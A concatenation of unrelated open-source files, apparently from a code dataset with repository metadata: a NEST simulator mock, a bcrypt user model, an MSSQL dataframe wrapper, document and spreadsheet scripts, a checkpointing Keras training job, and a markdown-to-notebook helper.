[
"BSD-3-Clause"
] | 1
|
2021-06-11T09:11:33.000Z
|
2021-06-11T09:11:33.000Z
|
python/tests/app_sim1.py
|
multiscale-cosim/EBRAINS-translators
|
ac48debf85e83674dad4b54aa1daf5419465f805
|
[
"BSD-3-Clause"
] | 2
|
2020-07-17T08:34:54.000Z
|
2020-07-17T08:35:31.000Z
|
python/tests/app_sim1.py
|
multiscale-cosim/EBRAINS-translators
|
ac48debf85e83674dad4b54aa1daf5419465f805
|
[
"BSD-3-Clause"
] | 1
|
2021-06-08T07:33:21.000Z
|
2021-06-08T07:33:21.000Z
|
# ------------------------------------------------------------------------------
# Copyright 2020 Forschungszentrum Jülich GmbH
# "Licensed to the Apache Software Foundation (ASF) under one or more contributor
# license agreements; and to You under the Apache License, Version 2.0. "
#
# Forschungszentrum Jülich
# Institute: Institute for Advanced Simulation (IAS)
# Section: Jülich Supercomputing Centre (JSC)
# Division: High Performance Computing in Neuroscience
# Laboratory: Simulation Laboratory Neuroscience
# Team: Multi-scale Simulation and Design
#
# ------------------------------------------------------------------------------
import sys
import placeholders.Simulation_mock as mock
from placeholders.parameter import Parameter
from python.Application_Companion.common_enums import SteeringCommands
from mock_simulator_wrapper import MockWrapper
if __name__ == '__main__':
'''mock for NEST simulation with steering support.'''
# initialize parameters
parameters = Parameter()
# instantiate NEST mock simulator
nest = mock.NestMock(parameters.get_nest_path())
# set direction to the parameter received via Popen subprocess
direction = sys.argv[1] # TODO validate the args
# STEP 1. INIT steering command
# NOTE INIT is a system action and so is done implicitly when initializes
# the simulator
# instantiate the wrapper. and initialize the simulator
simulator_wrapper = MockWrapper(direction, nest)
# STEP 2. START steering command
# receive steering command from Application Manager via (stdin) PIPE
user_action_command = input()
# execute if steering command is START
if SteeringCommands[user_action_command] == SteeringCommands.START:
simulator_wrapper.execute_start_command()
sys.exit(0)
else:
# TODO raise and log the exception with traceback and terminate with
# error if received an unknown steering command
print(f'unknown steering command: '
f'{SteeringCommands[user_action_command]}',
file=sys.stderr)
sys.exit(1)
| 41.254902
| 81
| 0.68251
|
acff8664641307d45554f00d31ef5a16816b81a8
| 1,554
|
py
|
Python
|
api/zeus_api/models/user.py
|
imthaghost/digift
|
6d7582204000190d7f11cbf22a4ecabfbd3c45c4
|
[
"MIT"
] | 7
|
2020-02-19T23:17:59.000Z
|
2021-04-09T08:51:28.000Z
|
api/zeus_api/models/user.py
|
imthaghost/digift
|
6d7582204000190d7f11cbf22a4ecabfbd3c45c4
|
[
"MIT"
] | 2
|
2021-03-31T20:04:31.000Z
|
2021-12-13T20:40:59.000Z
|
FinalProject/api/zeus_api/models/user.py
|
SamuelFolledo/SPD1.3
|
aa28fb738191f315b6627250049db029f8b62585
|
[
"MIT"
] | 3
|
2020-01-28T17:00:59.000Z
|
2020-02-02T07:45:48.000Z
|
"""User Model"""
# built in python modules
# external python modules
import uuid
from bcrypt import hashpw, gensalt
# local python modules
import zeus_api
class User(object):
def __init__(self, full_name, email='None', password='None'):
self.full_name = full_name # users full name
# password is not required because a user can sign up with OAUTH
self.premium = False # intialize premium to false
# user porfolio is a list of companies
self.portfolio = [zeus_api.models.company.Company]
self.uuid = None # initalize no uuid
self.investor_type = None # initialize the investor type to None
self.email = email # email will be the username
self.password = hashpw(password.encode(
'utf-8'), gensalt()) # set password
self.phonenumber = None # user phone number
def set_uuid(self):
self.uuid = str(uuid.uuid4())
def serialize(self):
# serialize user details
return {
"email": self.email,
"uuid": self.uuid,
"password": self.password,
"fullname": self.full_name,
"premium": self.premium,
"investor_type": self.investor_type,
# "portfolio": self.portfolio,
"phonenumber": self.phonenumber
}
def save_new(self):
# todo refactor to make more DRY for all Models
# todo generate a token and sent to users email
# saves new user to database
zeus_api.user.insert_one(self.serialize())
| 33.782609
| 73
| 0.621622
|
acff86b9d3c24f3fa0afa9c4043558f492cfb615
| 3,865
|
py
|
Python
|
mssql_dataframe/package.py
|
jwcook23/mssql_dataframe
|
ba7191e1b159a0b1292bf6825fcdf1fe5ce7c496
|
[
"MIT"
] | null | null | null |
mssql_dataframe/package.py
|
jwcook23/mssql_dataframe
|
ba7191e1b159a0b1292bf6825fcdf1fe5ce7c496
|
[
"MIT"
] | 18
|
2021-08-05T19:29:25.000Z
|
2022-03-02T16:08:08.000Z
|
mssql_dataframe/package.py
|
jwcook23/mssql_dataframe
|
ba7191e1b159a0b1292bf6825fcdf1fe5ce7c496
|
[
"MIT"
] | 1
|
2022-02-08T09:14:56.000Z
|
2022-02-08T09:14:56.000Z
|
"""Classes for all functionality within mssql_dataframe in a convenient package."""
import warnings
from mssql_dataframe.connect import connect
from mssql_dataframe.core import (
custom_warnings,
custom_errors,
conversion,
create,
modify,
read,
)
from mssql_dataframe.core.write.write import write
class SQLServer(connect):
"""Class containing methods for creating, modifying, reading, and writing between dataframes and SQL Server.
If autoadjust_sql_objects is True SQL objects may be modified such as creating a table, adding a column,
or increasing the size of a column. The exception is internal tracking metadata columns _time_insert and
_time_update which will always be created if include_metadata_timestamps=True.
Parameters
----------
database (str, default='master') : name of database to connect to
server (str, default='localhost') : name of server to connect to
driver (str, default=None) : ODBC driver name to use, if not given is automatically determined
username (str, default=None) : if not given, use Windows account credentials to connect
password (str, default=None) : if not given, use Windows account credentials to connect
include_metadata_timestamps (bool, default=False) : include metadata timestamps _time_insert & _time_update in server time for write operations
autoadjust_sql_objects (bool, default=False) : create and modify SQL table and columns as needed if True
Properties
----------
create : methods for creating SQL tables objects
modify : methods for modifying tables columns and primary keys
read : methods for reading from SQL tables
write : methods for inserting, updating, and merging records
Example
-------
#### connect to a local host database, with the ability to automatically adjust SQL objects
sql = SQLServer(autoadjust_sql_objects=True)
#### connect to Azure SQL Server instance
sql = SQLServer(server='<server>.database.windows.net', username='<username>', password='<password>')
"""
def __init__(
self,
database: str = "master",
server: str = "localhost",
driver: str = None,
username: str = None,
password: str = None,
include_metadata_timestamps: bool = False,
autoadjust_sql_objects: bool = False,
):
connect.__init__(self, database, server, driver, username, password)
# initialize mssql_dataframe functionality with shared connection
self.exceptions = custom_errors
self.create = create.create(self.connection, include_metadata_timestamps)
self.modify = modify.modify(self.connection)
self.read = read.read(self.connection)
self.write = write(
self.connection, include_metadata_timestamps, autoadjust_sql_objects
)
# issue warnings for automated functionality
if include_metadata_timestamps:
warnings.warn(
"SQL write operations will include metadata _time_insert & time_update columns as include_metadata_timestamps=True",
custom_warnings.SQLObjectAdjustment,
)
if autoadjust_sql_objects:
warnings.warn(
"SQL objects will be created/modified as needed as autoadjust_sql_objects=True",
custom_warnings.SQLObjectAdjustment,
)
def get_schema(self, table_name: str):
"""Get schema of an SQL table and the defined conversion rules between data types.
Parameters
----------
table_name (str) : table name to read schema from
Returns
-------
schema (pandas.DataFrame) : table column specifications and conversion rules
"""
schema, _ = conversion.get_schema(self.connection, table_name)
return schema
| 38.65
| 147
| 0.689521
|
acff88e6dfc57304e81cb5127d075c062d9066b5
| 335
|
py
|
Python
|
pdf/word_e_excel.py
|
DaviNakamuraCardoso/Projeto-ATMCP
|
ac4bbde04294681091d916e83c20c27be67c623a
|
[
"MIT"
] | null | null | null |
pdf/word_e_excel.py
|
DaviNakamuraCardoso/Projeto-ATMCP
|
ac4bbde04294681091d916e83c20c27be67c623a
|
[
"MIT"
] | null | null | null |
pdf/word_e_excel.py
|
DaviNakamuraCardoso/Projeto-ATMCP
|
ac4bbde04294681091d916e83c20c27be67c623a
|
[
"MIT"
] | null | null | null |
import csv
import docx
file = open('names.csv')
reader = csv.reader(file)
data = list(reader)
word = docx.Document()
for i in range(len(data)):
word.add_paragraph('Melado Productions tem o prazer de convidar')
word.add_paragraph(data[i])
word.add_paragraph('para o 1º Festival Melado de Filmes')
word.save('guests.docx')
| 23.928571
| 69
| 0.722388
|
acff88f6626ef20608ac2bebf2f0d7127336b1d9
| 12,488
|
py
|
Python
|
aalh_iit_rudolphgartnercollection/cleanup-place-column.py
|
johndewees/iitmigration
|
4dadfbecda719d6e7d60af076a231aedec3c862f
|
[
"Unlicense"
] | null | null | null |
aalh_iit_rudolphgartnercollection/cleanup-place-column.py
|
johndewees/iitmigration
|
4dadfbecda719d6e7d60af076a231aedec3c862f
|
[
"Unlicense"
] | null | null | null |
aalh_iit_rudolphgartnercollection/cleanup-place-column.py
|
johndewees/iitmigration
|
4dadfbecda719d6e7d60af076a231aedec3c862f
|
[
"Unlicense"
] | null | null | null |
from openpyxl import load_workbook
filename = 'aalh_iit_rudolphgartnercollection.xlsx'
wb = load_workbook(filename)
ws = wb['Metadata Template']
minimumcol = 8
maximumcol = 8
minimumrow = 7
maximumrow = 224
iterationrow = 84
desccol = 8
targetcol = 13
rawcovcol = 49
for row in ws.iter_rows(min_row=minimumrow, min_col=minimumcol, max_row=maximumrow, max_col=maximumcol):
for cell in row:
print(iterationrow)
testvar = ws.cell(row=iterationrow, column=rawcovcol).value
if testvar == None:
ws.cell(row=iterationrow, column=targetcol).value = ''
print('Intentionally left blank')
elif testvar.find('Philadelphia') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Philadelphia (Pennsylvania); Philadelphia County (Pennsylvania)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Cleveland') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Cleveland (Ohio); Cuyahoga County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Okolona') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Okolona (Ohio); Henry County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Napoleon') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Napoleon (Ohio); Henry County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Upper Sandusky') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Upper Sandusky (Ohio); Wyandot County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Sandusky') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Sandusky (Ohio); Erie County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Mt. Vernon') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Mt. Vernon (Ohio); Knox County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Detroit') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Detroit (Michigan); Wayne County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Sylvania') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Sylvania (Ohio); Lucas County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Oregon') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Oregon (Ohio); Lucas County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Brooklyn') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Brooklyn (Michigan); Jackson County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Knoxville') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Knoxville (Tennessee); Knox County (Tennessee)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Ada, Ohio') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Ada (Ohio); Hardin County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Waterville') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Waterville (Ohio); Lucas County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Bowling Green') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Bowling Green (Ohio); Wood County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Perrysburg') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Perrysburg (Ohio); Wood County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Ottokee') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Ottokee (Ohio); Fulton County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Marblehead') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Marblehead (Ohio); Ottawa County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Delta') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Delta (Ohio); Fulton County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Genoa') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Genoa (Ohio); Ottawa County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Grand Rapids') != -1:
if testvar.find('Ohio') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Grand Rapids (Ohio); Wood County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Michigan') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Grand Rapids (Michigan); Kent County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Niagara Falls') != -1:
if testvar.find('New York') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Niagara Falls (New York); Niagara County (New York)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Canada') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Niagara Falls (Canada)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Buffalo') != -1:
if testvar.find('New York') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Buffalo (New York); Erie County (New York)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Galloway') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Galloway (Ohio); Franklin County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Bryan') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Bryan (Ohio); Williams County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Pemberville') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Pemberville (Ohio); Wood County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Bradner') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Bradner (Ohio); Wood County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Port Clinton') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Port Clinton (Ohio); Ottawa County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Monroeville') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Monroeville (Ohio); Huron County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Dundee') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Dundee (Michigan); Monroe County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Monroe') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Monroe (Michigan); Monroe County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Fremont') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Fremont (Ohio); Sandusky County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Fayette') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Fayette (Ohio); Fulton County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Springfield') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Springfield (Ohio); Clark County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Ann Arbor') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Ann Arbor (Michigan); Washtenaw County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Tiffin') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Tiffin (Ohio); Seneca County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Delphos') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Delphos (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Sault St. Marie') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Sault St. Marie (Michigan), Chippewa County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Defiance') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Defiance (Ohio); Defiance County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Louisville') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Louisville (Kentucky); Jefferson County (Kentucky)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Put-in-Bay') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Put-in-Bay Township (Ohio); Ottawa County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('St. Paul') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Saint Paul (Minnesota); Ramsey County (Minnesota)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Saint Paul') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Saint Paul (Minnesota); Ramsey County (Minnesota)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Providence') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Providence Township (Ohio); Lucas County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Winona') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Winona (Minnesota); Winona County (Minnesota)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Galveston') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Galveston (Texas); Galveston County (Texas)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Camden') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Camden (New Jersey); Camden County (New Jersey)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Swanton') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Swanton (Ohio); Lucas County (Ohio)'
print(ws.cell(row=iterationrow, column=targetcol).value)
elif testvar.find('Highland Park') != -1:
ws.cell(row=iterationrow, column=targetcol).value = 'Highland Park (Michigan); Waryne County (Michigan)'
print(ws.cell(row=iterationrow, column=targetcol).value)
else :
print('No changes needed')
iterationrow = iterationrow + 1
wb.save("aalh_iit_rudolphgartnercollection.xlsx")
| 68.240437
| 130
| 0.630926
|
acff895cef9884f0d2770fb25e5b6ebafb30117e
| 6,984
|
py
|
Python
|
examples/pwr_run/checkpointing/socket_short/min_par/job9.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/socket_short/min_par/job9.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
examples/pwr_run/checkpointing/socket_short/min_par/job9.py
|
boringlee24/keras_old
|
1e1176c45c4952ba1b9b9e58e9cc4df027ab111d
|
[
"MIT"
] | null | null | null |
"""
#Trains a ResNet on the CIFAR10 dataset.
"""
from __future__ import print_function
import keras
from keras.layers import Dense, Conv2D, BatchNormalization, Activation
from keras.layers import AveragePooling2D, Input, Flatten
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras.callbacks import ReduceLROnPlateau, TensorBoard
from keras.preprocessing.image import ImageDataGenerator
from keras.regularizers import l2
from keras import backend as K
from keras.models import Model
from keras.datasets import cifar10
from keras.applications.mobilenet_v2 import MobileNetV2
from keras import models, layers, optimizers
from datetime import datetime
import tensorflow as tf
import numpy as np
import os
import pdb
import sys
import argparse
import time
import signal
import glob
import json
import send_signal
# CLI: testcase label, resume flag, GPU selection and scheduler host.
parser = argparse.ArgumentParser(description='Tensorflow Cifar10 Training')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='specific testcase name')
parser.add_argument('--resume', dest='resume', action='store_true', help='if True, resume training from a checkpoint')
parser.add_argument('--gpu_num', metavar='GPU_NUMBER', type=str, help='select which gpu to use')
parser.add_argument('--node', metavar='HOST_NODE', type=str, help='node of the host (scheduler)')
parser.set_defaults(resume=False)
args = parser.parse_args()
# Pin the process to the GPU chosen by the scheduler.
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu_num
# Training parameters
batch_size = 128
args_lr = 0.01
epoch_begin_time = 0
# Job name is the script filename without extension (e.g. 'job9').
job_name = sys.argv[0].split('.')[0]
# Glob matching this job's checkpoints (suffix encodes the epoch number).
save_files = '/scratch/li.baol/checkpoint_min_param/' + job_name + '*'
total_epochs = 4
starting_epoch = 0
# first step is to update the PID
# Register this process's PID with the scheduler: read-modify-write the
# lock file, then rename it to pid.json to publish it atomically.
pid_dict = {}
with open('pid_lock.json', 'r') as fp:
    pid_dict = json.load(fp)
pid_dict[job_name] = os.getpid()
json_file = json.dumps(pid_dict)
with open('pid_lock.json', 'w') as fp:
    fp.write(json_file)
os.rename('pid_lock.json', 'pid.json')
if args.resume:
    # NOTE(review): assumes exactly one matching checkpoint and that path
    # component [4] is the filename ('.../checkpoint_min_param/<name>_<ep>.h5')
    # -- breaks if the directory depth changes.  The trailing '_<epoch>' is
    # parsed back out to continue training where the job was killed.
    save_file = glob.glob(save_files)[0]
    # epochs = int(save_file.split('/')[4].split('_')[1].split('.')[0])
    starting_epoch = int(save_file.split('/')[4].split('.')[0].split('_')[-1])
data_augmentation = True
num_classes = 10
# Subtracting pixel mean improves accuracy
subtract_pixel_mean = True
n = 3
# Model name, depth and version
model_type = args.tc #'P100_resnet50_he_256_1'
# Load the CIFAR10 data.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# If subtract pixel mean is enabled
if subtract_pixel_mean:
    x_train_mean = np.mean(x_train, axis=0)
    x_train -= x_train_mean
    x_test -= x_train_mean
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
print('y_train shape:', y_train.shape)
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
if args.resume:
    # Resume: restore the full model (weights + optimizer state).
    print('resume from checkpoint')
    model = keras.models.load_model(save_file)
else:
    # Fresh start: MobileNetV2 backbone (random init) + softmax head.
    print('train from start')
    model = models.Sequential()
    base_model = MobileNetV2(weights=None, include_top=False, input_shape=(32, 32, 3), pooling=None)
    #base_model.summary()
    #pdb.set_trace()
    model.add(base_model)
    model.add(layers.Flatten())
    #model.add(layers.BatchNormalization())
    #model.add(layers.Dense(128, activation='relu'))
    #model.add(layers.Dropout(0.5))
    #model.add(layers.BatchNormalization())
    #model.add(layers.Dense(64, activation='relu'))
    #model.add(layers.Dropout(0.5))
    #model.add(layers.BatchNormalization())
    model.add(layers.Dense(10, activation='softmax'))
    model.compile(loss='categorical_crossentropy',
                  optimizer=Adam(lr=args_lr),
                  metrics=['accuracy'])
    #model.summary()
print(model_type)
#pdb.set_trace()
# Tracks the epoch currently in progress (updated by the PrintEpoch callback).
current_epoch = 0
################### connects interrupt signal to the process #####################
def terminateProcess(signalNumber, frame):
    """SIGTERM handler: account wasted epoch time, checkpoint the model,
    mark the checkpoint as taken in checkpoint.json, then exit.
    """
    # first record the wasted epoch time
    global epoch_begin_time
    if epoch_begin_time == 0:
        # No epoch has started yet, so nothing was wasted.
        epoch_waste_time = 0
    else:
        epoch_waste_time = int(time.time() - epoch_begin_time)
    # Accumulate this job's wasted seconds in the shared JSON ledger.
    epoch_waste_dict = {}
    with open('epoch_waste.json', 'r') as fp:
        epoch_waste_dict = json.load(fp)
    epoch_waste_dict[job_name] += epoch_waste_time
    json_file3 = json.dumps(epoch_waste_dict)
    with open('epoch_waste.json', 'w') as fp:
        fp.write(json_file3)
    print('checkpointing the model triggered by kill -15 signal')
    # delete whatever checkpoint that already exists
    for f in glob.glob(save_files):
        os.remove(f)
    # Checkpoint filename encodes the epoch so resume can restart from it.
    model.save('/scratch/li.baol/checkpoint_min_param/' + job_name + '_' + str(current_epoch) + '.h5')
    print ('(SIGTERM) terminating the process')
    # Tell the scheduler a checkpoint now exists for this job.
    checkpoint_dict = {}
    with open('checkpoint.json', 'r') as fp:
        checkpoint_dict = json.load(fp)
    checkpoint_dict[job_name] = 1
    json_file3 = json.dumps(checkpoint_dict)
    with open('checkpoint.json', 'w') as fp:
        fp.write(json_file3)
    sys.exit()
# Install the handler so 'kill -15' checkpoints instead of just dying.
signal.signal(signal.SIGTERM, terminateProcess)
#################################################################################
# Per-job TensorBoard log directory, grouped by testcase.
logdir = '/scratch/li.baol/tsrbrd_log/job_runs/' + model_type + '/' + job_name
tensorboard_callback = TensorBoard(log_dir=logdir)#, update_freq='batch')
class PrintEpoch(keras.callbacks.Callback):
    """Keras callback that records which epoch is running and when it
    started, so the SIGTERM handler can account partially-done work.
    """
    def on_epoch_begin(self, epoch, logs=None):
        global current_epoch
        #remaining_epochs = epochs - epoch
        current_epoch = epoch
        print('current epoch ' + str(current_epoch))
        # Timestamp used to compute wasted time if the job is killed mid-epoch.
        global epoch_begin_time
        epoch_begin_time = time.time()
my_callback = PrintEpoch()
callbacks = [tensorboard_callback, my_callback]
#[checkpoint, lr_reducer, lr_scheduler, tensorboard_callback]
# Run training
if not args.resume:
    # Report the model's trainable-parameter count to the scheduler once,
    # on the first (non-resumed) run.
    trainable_count = int(np.sum([K.count_params(p) for p in set(model.trainable_weights)]))
    # send signal 'jobxx param xxxxx'
    message = job_name + ' param ' + str(trainable_count)
    send_signal.send(args.node, 10002, message)
# send signal to indicate checkpoint is qualified
message = job_name + ' ckpt_qual'
send_signal.send(args.node, 10002, message)
# NOTE(review): only total_epochs/2 epochs are run here -- presumably the
# scheduler restarts the job for the remainder; confirm against the scheduler.
model.fit(x_train, y_train,
          batch_size=batch_size,
          epochs=round(total_epochs/2),
          validation_data=(x_test, y_test),
          shuffle=True,
          callbacks=callbacks,
          initial_epoch=starting_epoch,
          verbose=1
          )
# Score trained model.
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
# send signal to indicate job has finished
message = job_name + ' finish'
send_signal.send(args.node, 10002, message)
| 31.04
| 118
| 0.703179
|
acff896af252fa2ff6dfdb7164ea3338a5a70aa6
| 2,862
|
py
|
Python
|
util/notebook_helpers.py
|
ChidinmaKO/noBSLAnotebooks
|
c0102473f1e6625fa5fb62768d4545059959fa26
|
[
"MIT"
] | 116
|
2016-04-20T13:56:02.000Z
|
2022-03-30T08:55:08.000Z
|
util/notebook_helpers.py
|
ChidinmaKO/noBSLAnotebooks
|
c0102473f1e6625fa5fb62768d4545059959fa26
|
[
"MIT"
] | 2
|
2021-07-01T17:00:38.000Z
|
2021-07-01T19:34:09.000Z
|
util/notebook_helpers.py
|
ChidinmaKO/noBSLAnotebooks
|
c0102473f1e6625fa5fb62768d4545059959fa26
|
[
"MIT"
] | 29
|
2017-02-04T05:22:23.000Z
|
2021-12-28T00:06:50.000Z
|
import re

# Markdown heading marker for each supported list-nesting level (1-4).
HEADING_MARKERS = {
    1: "# ",
    2: "## ",
    3: "### ",
    4: "#### "
}

# JSON fragment for a notebook markdown cell; ``%s`` receives the escaped text.
MARKDOWN_CELL_TEMPLATE = """
{
"cell_type": "markdown",
"metadata": {},
"source": [
"%s"
]
},"""

# JSON fragment for an empty notebook code cell.
EMPTY_CODE_CELL = """
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"collapsed": true
},
"outputs": [],
"source": []
},"""

def create_ipynb_json_from_md(md_source, extra_code_cells=2):
    """Convert markdown list items in ``md_source`` into Jupyter-notebook JSON.

    Each ``-``/``*`` list item becomes a markdown cell whose heading depth
    matches the item's nesting level, followed by ``extra_code_cells`` empty
    code cells.  Blank and non-list lines are ignored.  The result is a JSON
    fragment meant for copy-pasting into a notebook file's ``cells`` array.

    NOTE(review): nesting deeper than 4 levels raises ``KeyError`` because
    ``HEADING_MARKERS`` only defines levels 1-4 (unchanged from the original).
    """
    output = ""
    # BUG FIX: the bullet class used to be ``[-|\*]``; inside a character
    # class ``|`` is a literal, so lines starting with '|' (e.g. markdown
    # tables) were wrongly treated as list items.
    list_item_re = re.compile(r"(?P<presp>\s*)[-*](?P<postsp>\s{1,4})(?P<rest>.*)")
    # STATE
    level = 0  # current list-nesting level (0 = not inside a list)
    indents = {
        1: 0,  # indentation (in spaces) at which level-N items appear
        2: 0,
        3: 0,
        4: 0
    }
    for line in md_source.splitlines():
        if not line.strip():  # skip blank lines
            continue
        list_item = list_item_re.match(line)
        if list_item:
            groups = list_item.groupdict()
            presp, postsp, rest = groups['presp'], groups['postsp'], groups['rest']
            # Escape backslashes so the text survives JSON string quoting.
            rest_escaped = rest.replace("\\", "\\\\")
            # Effective indent = leading spaces + bullet char + post-bullet spaces.
            line_indent = len(presp) + 1 + len(postsp)
            if level == 0:  # start the initial list
                level = 1
                indents[level] = line_indent
            elif line_indent > indents[level]:  # start a deeper list
                level += 1
                indents[level] = line_indent
            elif line_indent < indents[level]:  # close one or more lists
                if line_indent == indents[level - 1]:
                    level = level - 1
                elif line_indent == indents[level - 2]:
                    level = level - 2
                elif line_indent == indents[level - 3]:
                    level = level - 3
            # else: same indent -> continue the current list
